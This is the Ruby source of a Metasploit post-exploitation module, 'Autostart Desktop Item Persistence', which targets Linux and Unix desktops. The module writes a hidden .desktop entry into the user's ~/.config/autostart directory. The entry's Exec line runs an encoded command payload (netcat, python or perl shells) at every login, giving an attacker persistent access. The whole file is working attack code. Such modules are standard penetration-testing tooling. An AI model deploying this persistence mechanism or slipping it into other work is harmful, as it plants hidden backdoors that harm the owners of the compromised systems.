## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Unix def initialize(info = {}) super(update_info(info, 'Name' => 'Autostart Desktop Item Persistence', 'Description' => %q( This module will create an autostart entry to execute a payload. The payload will be executed when the users logs in. ), 'License' => MSF_LICENSE, 'Author' => [ 'Eliott Teissonniere' ], 'Platform' => [ 'unix', 'linux' ], 'Arch' => ARCH_CMD, 'Payload' => { 'BadChars' => '#%\n"', 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic python netcat perl' } }, 'SessionTypes' => [ 'shell', 'meterpreter' ], 'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' }, 'DisclosureDate' => 'Feb 13 2006', # Date of the 0.5 doc for autostart 'Targets' => [ ['Automatic', {}] ], 'DefaultTarget' => 0 )) register_options([ OptString.new('NAME', [false, 'Name of autostart entry' ]) ]) end def exploit name = datastore['NAME'] || Rex::Text.rand_text_alpha(5) home = cmd_exec('echo ~') path = "#{home}/.config/autostart/#{name}.desktop" print_status('Making sure the autostart directory exists') cmd_exec("mkdir -p #{home}/.config/autostart") # in case no autostart exists print_status("Uploading autostart file #{path}") write_file(path, [ "[Desktop Entry]", "Type=Application", "Name=#{name}", "NoDisplay=true", "Terminal=false", "Exec=/bin/sh -c \"#{payload.encoded}\"" ].join("\n")) end end